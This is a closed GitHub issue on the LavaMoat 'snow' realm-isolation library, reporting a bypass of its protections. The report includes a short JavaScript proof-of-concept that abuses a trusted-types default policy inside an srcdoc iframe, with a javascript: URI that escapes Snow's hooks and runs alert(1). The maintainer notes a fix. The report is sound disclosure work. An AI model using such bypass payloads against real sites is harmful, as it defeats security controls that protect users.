search

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License
102 stars 9 forks source link

Bypass using trusted types default policy #90

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago 
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
  <iframe srcdoc="
    <meta http-equiv='Content-Security-Policy' content=&quot;require-trusted-types-for 'script';&quot;>. 
    <script>
      trustedTypes.createPolicy('default', { createHTML: s=>s, createScript: function (s) { return ''; } });
      setTimeout(()=>frames[0].alert(1),100);
    </script>
  <iframe src=\'javascript:alert(1)\'</iframe>"></iframe>
`

The idea was taking advantage of trusted types default policy to break the "atomicity" of the hooks (i.e., the malicious policy will get called after the hooks, but before the actual HTML/script assignment). There are several different directions, here I just use the createScript to break the internal SNOW_WINDOW(this) in the javascript: URI :)

weizman commented 1 year ago

Think I'm gonna remove srcdoc CSP attempts all together (read further @ #104)

weizman commented 1 year ago

fixed by #104